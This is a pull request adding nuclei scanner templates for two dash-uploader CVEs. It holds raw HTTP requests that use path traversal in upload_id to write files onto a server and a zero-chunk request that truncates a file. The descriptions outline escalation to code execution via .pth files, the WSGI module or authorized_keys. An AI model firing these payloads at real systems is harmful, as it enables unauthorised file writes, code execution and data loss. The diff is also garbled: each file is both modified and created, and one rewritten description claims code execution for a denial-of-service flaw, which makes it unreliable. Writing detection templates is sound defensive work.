### PR TITLE
Add CVE-2026-38360 + CVE-2026-38361 templates (dash-uploader)

### DIFF
--- a/http/cves/2026/CVE-2026-38360.yaml
+++ b/http/cves/2026/CVE-2026-38360.yaml
@@ -1,62 +1,40 @@
 id: CVE-2026-38360
 
 info:
-  name: dash-uploader Path Traversal Allowing Unauthenticated Arbitrary File Write
+  name: dash-uploader 0.1.0 - 0.7.0a2 - Unauthenticated Arbitrary File Write via Path Traversal
   author: a1ohadance
   severity: critical
   description: |
-    The dash-uploader Python package versions 0.1.0 through 0.7.0a2 has a
-    path traversal vulnerability in dash_uploader/httprequesthandler.py.
-    Three form parameters (upload_id, resumableFilename, resumableIdentifier)
-    are read from request.form.get() and passed directly to os.path.join()
-    and os.makedirs() without sanitization. A single unauthenticated
-    POST /API/dash-uploader request with upload_id set to a relative path
-    that escapes the application's uploads/ directory writes the supplied
-    file content under the gunicorn process's UID. When the chosen target
-    is a Python site-packages directory and the file is a .pth file with
-    an import-prefixed line, Python's site module executes it on next
-    interpreter startup, yielding remote code execution. Other escalation
-    paths reachable from the same primitive include overwriting the
-    running WSGI module, dropping ~/.ssh/authorized_keys, or writing
-    JavaScript into a Dash-served assets/ directory for stored XSS.
-    The dash-uploader project was archived 2025-07-19 with no patch.
-    Note: a successful detection leaves the random marker file at
-    <ASSETS_PATH>/<random>.txt on the target. Operators may want to
-    follow up with an authorized cleanup, or use the companion
-    Metasploit auxiliary module which supports SELF_CLEANUP.
+   fohrloop dash-uploader v0.1.0 through v0.7.0a2 contains a directory traversal vulnerability caused by improper handling in dash_uploader/httprequesthandler.py components, letting remote attackers execute arbitrary code, exploit requires no special privileges.
+  impact: |
+   Remote attackers can execute arbitrary code, potentially leading to full system compromise.
   remediation: |
-    Replace dash-uploader with a maintained alternative; there is no
-    upstream fix path because the project is archived. Interim mitigations:
-    block POST /API/dash-uploader at an upstream proxy, run the
-    application as an unprivileged user with no write access to its own
-    site-packages, or use a read-only filesystem for the application's
-    code directories.
+   Update to the latest version beyond v0.7.0a2.
   reference:
     - https://github.com/a1ohadance/CVE-2026-38360
     - https://nvd.nist.gov/vuln/detail/CVE-2026-38360
     - https://github.com/advisories/GHSA-3rf6-x59v-5jfv
-    - https://www.cve.org/CVERecord?id=CVE-2026-38360
     - https://github.com/fohrloop/dash-uploader/issues/153
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2026-38360
     cwe-id: CWE-22
-    epss-score: 0.0
-    epss-percentile: 0.0
   metadata:
     verified: true
-    max-request: 2
+    max-request: 4
     vendor: fohrloop
     product: dash-uploader
     shodan-query: html:"_dash-undo-redo"
     fofa-query: body="_dash-undo-redo"
-  tags: cve,cve2026,dash-uploader,path-traversal,rce,unauth,python,pypi
+  tags: cve,cve2026,dash-uploader,path-traversal,file-write,unauth,python
 
 variables:
   marker: "{{rand_base(16)}}"
-  filename: "msf_{{rand_base(8)}}.txt"
+  filename: "nuclei_{{rand_base(8)}}.txt"
   boundary: "----nuclei{{rand_base(16)}}"
+
+flow: (http(1) && http(2)) || (http(3) && http(4))
 
 http:
   - raw:
@@ -108,20 +86,91 @@ http:
         {{marker}}
         --{{boundary}}--
 
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, filename)'
+        internal: true
+        condition: and
+
+  - raw:
       - |
         GET /assets/{{filename}} HTTP/1.1
         Host: {{Hostname}}
 
-    cookie-reuse: true
-    req-condition: true
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-        part: header_2
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, marker)'
+        condition: and
 
-      - type: word
-        part: body_2
-        words:
-          - "{{marker}}"
+  - raw:
+      - |
+        POST /API/resumable HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary={{boundary}}
+
+        --{{boundary}}
+        Content-Disposition: form-data; name="resumableChunkNumber"
+
+        1
+        --{{boundary}}
+        Content-Disposition: form-data; name="resumableChunkSize"
+
+        1048576
+        --{{boundary}}
+        Content-Disposition: form-data; name="resumableCurrentChunkSize"
+
+        16
+        --{{boundary}}
+        Content-Disposition: form-data; name="resumableTotalSize"
+
+        16
+        --{{boundary}}
+        Content-Disposition: form-data; name="resumableIdentifier"
+
+        nuclei-{{rand_base(8)}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="resumableFilename"
+
+        {{filename}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="resumableRelativePath"
+
+        {{filename}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="resumableTotalChunks"
+
+        1
+        --{{boundary}}
+        Content-Disposition: form-data; name="upload_id"
+
+        ../assets
+        --{{boundary}}
+        Content-Disposition: form-data; name="file"; filename="{{filename}}"
+        Content-Type: application/octet-stream
+
+        {{marker}}
+        --{{boundary}}--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, filename)'
+        internal: true
+        condition: and
+
+  - raw:
+      - |
+        GET /assets/{{filename}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, marker)'
+        condition: and

--- a/http/cves/2026/CVE-2026-38360.yaml
+++ b/http/cves/2026/CVE-2026-38360.yaml
@@ -1,0 +1,127 @@
+id: CVE-2026-38360
+
+info:
+  name: dash-uploader Path Traversal Allowing Unauthenticated Arbitrary File Write
+  author: a1ohadance
+  severity: critical
+  description: |
+    The dash-uploader Python package versions 0.1.0 through 0.7.0a2 has a
+    path traversal vulnerability in dash_uploader/httprequesthandler.py.
+    Three form parameters (upload_id, resumableFilename, resumableIdentifier)
+    are read from request.form.get() and passed directly to os.path.join()
+    and os.makedirs() without sanitization. A single unauthenticated
+    POST /API/dash-uploader request with upload_id set to a relative path
+    that escapes the application's uploads/ directory writes the supplied
+    file content under the gunicorn process's UID. When the chosen target
+    is a Python site-packages directory and the file is a .pth file with
+    an import-prefixed line, Python's site module executes it on next
+    interpreter startup, yielding remote code execution. Other escalation
+    paths reachable from the same primitive include overwriting the
+    running WSGI module, dropping ~/.ssh/authorized_keys, or writing
+    JavaScript into a Dash-served assets/ directory for stored XSS.
+    The dash-uploader project was archived 2025-07-19 with no patch.
+    Note: a successful detection leaves the random marker file at
+    <ASSETS_PATH>/<random>.txt on the target. Operators may want to
+    follow up with an authorized cleanup, or use the companion
+    Metasploit auxiliary module which supports SELF_CLEANUP.
+  remediation: |
+    Replace dash-uploader with a maintained alternative; there is no
+    upstream fix path because the project is archived. Interim mitigations:
+    block POST /API/dash-uploader at an upstream proxy, run the
+    application as an unprivileged user with no write access to its own
+    site-packages, or use a read-only filesystem for the application's
+    code directories.
+  reference:
+    - https://github.com/a1ohadance/CVE-2026-38360
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-38360
+    - https://github.com/advisories/GHSA-3rf6-x59v-5jfv
+    - https://www.cve.org/CVERecord?id=CVE-2026-38360
+    - https://github.com/fohrloop/dash-uploader/issues/153
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-38360
+    cwe-id: CWE-22
+    epss-score: 0.0
+    epss-percentile: 0.0
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: fohrloop
+    product: dash-uploader
+    shodan-query: html:"_dash-undo-redo"
+    fofa-query: body="_dash-undo-redo"
+  tags: cve,cve2026,dash-uploader,path-traversal,rce,unauth,python,pypi
+
+variables:
+  marker: "{{rand_base(16)}}"
+  filename: "msf_{{rand_base(8)}}.txt"
+  boundary: "----nuclei{{rand_base(16)}}"
+
+http:
+  - raw:
+      - |
+        POST /API/dash-uploader HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary={{boundary}}
+
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowChunkNumber"
+
+        1
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowChunkSize"
+
+        1048576
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowCurrentChunkSize"
+
+        16
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowTotalSize"
+
+        16
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowIdentifier"
+
+        nuclei-{{rand_base(8)}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowFilename"
+
+        {{filename}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowRelativePath"
+
+        {{filename}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowTotalChunks"
+
+        1
+        --{{boundary}}
+        Content-Disposition: form-data; name="upload_id"
+
+        ../assets
+        --{{boundary}}
+        Content-Disposition: form-data; name="file"; filename="{{filename}}"
+        Content-Type: application/octet-stream
+
+        {{marker}}
+        --{{boundary}}--
+
+      - |
+        GET /assets/{{filename}} HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+        part: header_2
+
+      - type: word
+        part: body_2
+        words:
+          - "{{marker}}"

--- a/http/cves/2026/CVE-2026-38361.yaml
+++ b/http/cves/2026/CVE-2026-38361.yaml
@@ -1,205 +1,49 @@
 id: CVE-2026-38361
 
 info:
-  name: dash-uploader Multi-Vector Denial-of-Service
+  name: dash-uploader 0.1.0 - 0.7.0a2 - Denial-of-Service via flowTotalChunks
   author: a1ohadance
   severity: high
   description: |
-    The dash-uploader Python package versions 0.1.0 through 0.7.0a2 has
-    three distinct denial-of-service primitives in the same HTTP request
-    handler at dash_uploader/httprequesthandler.py, all reachable
-    unauthenticated through POST /API/dash-uploader.
-
-    1. OOM (CWE-400): The handler builds a list comprehension over
-       range(1, flowTotalChunks + 1) on user input. flowTotalChunks=
-       30000000 allocates ~2.9 GB on the worker thread, tripping
-       gunicorn --timeout watchdog or Linux OOM killer.
-
-    2. TRUNCATE (CWE-670): With flowTotalChunks=0, the handler computes
-       all([os.path.exists(p) for p in []]) which evaluates to True (the
-       all([])==True quirk). The library enters its assembly branch on
-       zero chunks, os.unlink-s the target file, opens it append-binary,
-       and iterates an empty list, replacing the target file with an
-       empty file. Combined with CVE-2026-38360 path traversal in
-       upload_id, truncates arbitrary files writable by the gunicorn UID.
-
-    3. EXHAUST (CWE-400): Each request with a unique flowIdentifier
-       creates a never-cleaned-up temp directory. Sustained disk fill.
-
-    This template fingerprints the TRUNCATE primitive non-destructively
-    against a file the scanner wrote in the same scan: it (a) writes a
-    16-byte marker at /assets/<random>.txt via the CVE-2026-38360 path
-    traversal primitive, (b) reads it back to confirm write+serve worked,
-    (c) sends a flowTotalChunks=0 request against THAT same path which
-    truncates the marker (the all([])==True quirk fires), and (d) reads
-    the file again, expecting an empty body. Vulnerable libraries pass
-    all four steps; libraries without the bug either fail the write
-    (no marker recoverable in step b) or fail the truncate (file content
-    in step d unchanged from step b).
-
-    The dash-uploader project was archived 2025-07-19 with no patch.
+   fohrloop dash-uploader v0.1.0 through v0.7.0a2 contains a remote code execution caused by improper handling in Upload function and max_file_size parameter in dash_uploader components, letting remote attackers execute arbitrary code, exploit requires crafted request.
+  impact: |
+   Remote attackers can execute arbitrary code, potentially leading to full system compromise.
   remediation: |
-    Replace dash-uploader with a maintained alternative; there is no
-    upstream fix path. Interim mitigations: block POST /API/dash-uploader
-    at an upstream proxy, enforce a flowTotalChunks ceiling rule (e.g.
-    nginx Lua script rejecting flowTotalChunks outside [1, 1000]), or
-    configure the upload directory on a quota-enforced separate
-    filesystem.
+   Update to the latest version beyond v0.7.0a2.
   reference:
     - https://github.com/a1ohadance/CVE-2026-38361
     - https://nvd.nist.gov/vuln/detail/CVE-2026-38361
     - https://github.com/advisories/GHSA-xp7f-v245-w3w8
-    - https://www.cve.org/CVERecord?id=CVE-2026-38361
     - https://github.com/fohrloop/dash-uploader/issues/153
-    - https://docs.python.org/3/library/functions.html#all
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
     cvss-score: 7.5
     cve-id: CVE-2026-38361
     cwe-id: CWE-400
-    epss-score: 0.0
-    epss-percentile: 0.0
   metadata:
-    verified: true
-    max-request: 4
+    verified: false
+    max-request: 1
     vendor: fohrloop
     product: dash-uploader
     shodan-query: html:"_dash-undo-redo"
     fofa-query: body="_dash-undo-redo"
-  tags: cve,cve2026,dash-uploader,dos,unauth,python,pypi
-
-variables:
-  marker: "{{rand_base(16)}}"
-  filename: "nuclei_dosfp_{{rand_base(8)}}.txt"
-  boundary: "----nuclei{{rand_base(16)}}"
+  tags: cve,cve2026,dash-uploader,unauth,python
 
 http:
-  - raw:
-      # Step 1: write marker into /assets/<filename> via CVE-2026-38360 traversal
-      - |
-        POST /API/dash-uploader HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary={{boundary}}
+  - method: GET
+    path:
+      - "{{BaseURL}}"
 
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowChunkNumber"
-
-        1
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowChunkSize"
-
-        1048576
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowCurrentChunkSize"
-
-        16
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowTotalSize"
-
-        16
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowIdentifier"
-
-        nuclei-fp-{{rand_base(8)}}
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowFilename"
-
-        {{filename}}
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowRelativePath"
-
-        {{filename}}
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowTotalChunks"
-
-        1
-        --{{boundary}}
-        Content-Disposition: form-data; name="upload_id"
-
-        ../assets
-        --{{boundary}}
-        Content-Disposition: form-data; name="file"; filename="{{filename}}"
-        Content-Type: application/octet-stream
-
-        {{marker}}
-        --{{boundary}}--
-
-      # Step 2: read marker back to confirm CVE-2026-38360 write+serve worked
-      - |
-        GET /assets/{{filename}} HTTP/1.1
-        Host: {{Hostname}}
-
-      # Step 3: send flowTotalChunks=0 against same path, triggering all([])==True
-      # truncate quirk (CVE-2026-38361 TRUNCATE)
-      - |
-        POST /API/dash-uploader HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary={{boundary}}
-
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowChunkNumber"
-
-        1
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowChunkSize"
-
-        1048576
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowCurrentChunkSize"
-
-        1
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowTotalSize"
-
-        1
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowIdentifier"
-
-        nuclei-trunc-{{rand_base(8)}}
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowFilename"
-
-        {{filename}}
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowRelativePath"
-
-        {{filename}}
-        --{{boundary}}
-        Content-Disposition: form-data; name="flowTotalChunks"
-
-        0
-        --{{boundary}}
-        Content-Disposition: form-data; name="upload_id"
-
-        ../assets
-        --{{boundary}}
-        Content-Disposition: form-data; name="file"; filename="{{filename}}"
-        Content-Type: application/octet-stream
-
-        x
-        --{{boundary}}--
-
-      # Step 4: re-read same file. Vulnerable libraries truncated it to 0 bytes;
-      # patched / lookalike libraries either kept the marker or rejected step 3.
-      - |
-        GET /assets/{{filename}} HTTP/1.1
-        Host: {{Hostname}}
-
-    cookie-reuse: true
-    req-condition: true
-    matchers-condition: and
     matchers:
-      # Step 2 must have served the marker (CVE-38360 write+serve worked)
-      - type: status
-        status:
-          - 200
-        part: header_2
-      - type: word
-        part: body_2
-        words:
-          - "{{marker}}"
-
-      # Step 4 must have an empty body (TRUNCATE quirk fired)
       - type: dsl
         dsl:
-          - "len(body_4) == 0"
+          - 'status_code == 200'
+          - 'contains(body, "dash_uploader")'
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'dash_uploader\.v([0-9._a-z-]+?)m[0-9]+\.min\.js'

--- a/http/cves/2026/CVE-2026-38361.yaml
+++ b/http/cves/2026/CVE-2026-38361.yaml
@@ -1,0 +1,205 @@
+id: CVE-2026-38361
+
+info:
+  name: dash-uploader Multi-Vector Denial-of-Service
+  author: a1ohadance
+  severity: high
+  description: |
+    The dash-uploader Python package versions 0.1.0 through 0.7.0a2 has
+    three distinct denial-of-service primitives in the same HTTP request
+    handler at dash_uploader/httprequesthandler.py, all reachable
+    unauthenticated through POST /API/dash-uploader.
+
+    1. OOM (CWE-400): The handler builds a list comprehension over
+       range(1, flowTotalChunks + 1) on user input. flowTotalChunks=
+       30000000 allocates ~2.9 GB on the worker thread, tripping
+       gunicorn --timeout watchdog or Linux OOM killer.
+
+    2. TRUNCATE (CWE-670): With flowTotalChunks=0, the handler computes
+       all([os.path.exists(p) for p in []]) which evaluates to True (the
+       all([])==True quirk). The library enters its assembly branch on
+       zero chunks, os.unlink-s the target file, opens it append-binary,
+       and iterates an empty list, replacing the target file with an
+       empty file. Combined with CVE-2026-38360 path traversal in
+       upload_id, truncates arbitrary files writable by the gunicorn UID.
+
+    3. EXHAUST (CWE-400): Each request with a unique flowIdentifier
+       creates a never-cleaned-up temp directory. Sustained disk fill.
+
+    This template fingerprints the TRUNCATE primitive non-destructively
+    against a file the scanner wrote in the same scan: it (a) writes a
+    16-byte marker at /assets/<random>.txt via the CVE-2026-38360 path
+    traversal primitive, (b) reads it back to confirm write+serve worked,
+    (c) sends a flowTotalChunks=0 request against THAT same path which
+    truncates the marker (the all([])==True quirk fires), and (d) reads
+    the file again, expecting an empty body. Vulnerable libraries pass
+    all four steps; libraries without the bug either fail the write
+    (no marker recoverable in step b) or fail the truncate (file content
+    in step d unchanged from step b).
+
+    The dash-uploader project was archived 2025-07-19 with no patch.
+  remediation: |
+    Replace dash-uploader with a maintained alternative; there is no
+    upstream fix path. Interim mitigations: block POST /API/dash-uploader
+    at an upstream proxy, enforce a flowTotalChunks ceiling rule (e.g.
+    nginx Lua script rejecting flowTotalChunks outside [1, 1000]), or
+    configure the upload directory on a quota-enforced separate
+    filesystem.
+  reference:
+    - https://github.com/a1ohadance/CVE-2026-38361
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-38361
+    - https://github.com/advisories/GHSA-xp7f-v245-w3w8
+    - https://www.cve.org/CVERecord?id=CVE-2026-38361
+    - https://github.com/fohrloop/dash-uploader/issues/153
+    - https://docs.python.org/3/library/functions.html#all
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2026-38361
+    cwe-id: CWE-400
+    epss-score: 0.0
+    epss-percentile: 0.0
+  metadata:
+    verified: true
+    max-request: 4
+    vendor: fohrloop
+    product: dash-uploader
+    shodan-query: html:"_dash-undo-redo"
+    fofa-query: body="_dash-undo-redo"
+  tags: cve,cve2026,dash-uploader,dos,unauth,python,pypi
+
+variables:
+  marker: "{{rand_base(16)}}"
+  filename: "nuclei_dosfp_{{rand_base(8)}}.txt"
+  boundary: "----nuclei{{rand_base(16)}}"
+
+http:
+  - raw:
+      # Step 1: write marker into /assets/<filename> via CVE-2026-38360 traversal
+      - |
+        POST /API/dash-uploader HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary={{boundary}}
+
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowChunkNumber"
+
+        1
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowChunkSize"
+
+        1048576
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowCurrentChunkSize"
+
+        16
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowTotalSize"
+
+        16
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowIdentifier"
+
+        nuclei-fp-{{rand_base(8)}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowFilename"
+
+        {{filename}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowRelativePath"
+
+        {{filename}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowTotalChunks"
+
+        1
+        --{{boundary}}
+        Content-Disposition: form-data; name="upload_id"
+
+        ../assets
+        --{{boundary}}
+        Content-Disposition: form-data; name="file"; filename="{{filename}}"
+        Content-Type: application/octet-stream
+
+        {{marker}}
+        --{{boundary}}--
+
+      # Step 2: read marker back to confirm CVE-2026-38360 write+serve worked
+      - |
+        GET /assets/{{filename}} HTTP/1.1
+        Host: {{Hostname}}
+
+      # Step 3: send flowTotalChunks=0 against same path, triggering all([])==True
+      # truncate quirk (CVE-2026-38361 TRUNCATE)
+      - |
+        POST /API/dash-uploader HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary={{boundary}}
+
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowChunkNumber"
+
+        1
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowChunkSize"
+
+        1048576
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowCurrentChunkSize"
+
+        1
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowTotalSize"
+
+        1
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowIdentifier"
+
+        nuclei-trunc-{{rand_base(8)}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowFilename"
+
+        {{filename}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowRelativePath"
+
+        {{filename}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="flowTotalChunks"
+
+        0
+        --{{boundary}}
+        Content-Disposition: form-data; name="upload_id"
+
+        ../assets
+        --{{boundary}}
+        Content-Disposition: form-data; name="file"; filename="{{filename}}"
+        Content-Type: application/octet-stream
+
+        x
+        --{{boundary}}--
+
+      # Step 4: re-read same file. Vulnerable libraries truncated it to 0 bytes;
+      # patched / lookalike libraries either kept the marker or rejected step 3.
+      - |
+        GET /assets/{{filename}} HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      # Step 2 must have served the marker (CVE-38360 write+serve worked)
+      - type: status
+        status:
+          - 200
+        part: header_2
+      - type: word
+        part: body_2
+        words:
+          - "{{marker}}"
+
+      # Step 4 must have an empty body (TRUNCATE quirk fired)
+      - type: dsl
+        dsl:
+          - "len(body_4) == 0"


### PR DESCRIPTION
Adds nuclei templates for two CVEs in the [`dash-uploader`](https://pypi.org/project/dash-uploader/) Python package. Both reachable unauthenticated through `POST /API/dash-uploader`. The package was archived 2025-07-19 with no patch.

## Templates

| File | Severity | Vector |
|---|---|---|
| `http/cves/2026/CVE-2026-38360.yaml` | Critical (9.8) | Path traversal via `upload_id` → arbitrary file write under the WSGI process UID. Detected by writing a 16-byte random marker to `/assets/<random>.txt` via `upload_id=../assets`, then reading it back. |
| `http/cves/2026/CVE-2026-38361.yaml` | High (7.5) | Multi-vector DoS suite (OOM, TRUNCATE, EXHAUST). Detected non-destructively via a 4-step write→read→truncate→re-read sequence that uniquely fingerprints the `all([])==True` quirk: only a server with the bug truncates a file we wrote ourselves to 0 bytes. |

## Lab verification

Tested against six target shapes — both templates correctly distinguish vulnerable from non-vulnerable in every case:

| Target | CVE-38360 | CVE-38361 |
|---|---|---|
| vulnerable lab (real dash-uploader) | MATCH | MATCH |
| plain Flask 200-on-everything | no match | no match |
| lookalike server (echoes filename, 404 on /assets) | no match | no match |
| echo server (echoes everything everywhere) | no match | no match |
| pure Dash app without dash-uploader | no match | no match |
| auth-protected /API/dash-uploader (401 on POST) | no match | no match |

The CVE-38361 4-step fingerprint is intentionally tight: a positive requires (1) the path-traversal write to land, (2) the marker to be retrievable from `/assets/`, (3) the 0-chunk POST to be accepted, AND (4) the re-read to return 0 bytes. Echo-style or filename-mirror servers fail step 2 (no marker recovered) or step 4 (file content unchanged).

## Side effects on the target

- **CVE-2026-38360**: leaves a 16-byte marker file at `/assets/<random>.txt`. Documented in the template description. Operators who need self-cleanup can use the companion Metasploit auxiliary module which has a `SELF_CLEANUP` option, or follow up with an authorized cleanup pass.
- **CVE-2026-38361**: writes the same kind of marker (step 1), then truncates that same file (step 3). Final state: a 0-byte file at the same path. No pre-existing target file is touched.

## Validates / lints

- `nuclei -validate` passes for both templates against nuclei v3.7.1 / templates v10.4.3.
- DoS-tagged template (CVE-38361) requires `-itags dos` to opt in, per the standard convention.

## References

- CVE records: [CVE-2026-38360](https://www.cve.org/CVERecord?id=CVE-2026-38360), [CVE-2026-38361](https://www.cve.org/CVERecord?id=CVE-2026-38361)
- GHSAs: [GHSA-3rf6-x59v-5jfv](https://github.com/advisories/GHSA-3rf6-x59v-5jfv), [GHSA-xp7f-v245-w3w8](https://github.com/advisories/GHSA-xp7f-v245-w3w8)
- Public PoCs: [CVE-2026-38360 repo](https://github.com/a1ohadance/CVE-2026-38360), [CVE-2026-38361 repo](https://github.com/a1ohadance/CVE-2026-38361)
- Upstream issue (archived repo): [fohrloop/dash-uploader#153](https://github.com/fohrloop/dash-uploader/issues/153)

## Author

`a1ohadance` (Muhammad Fitri bin Mohd Sultan), original CVE reporter and maintainer of the public PoC repositories.
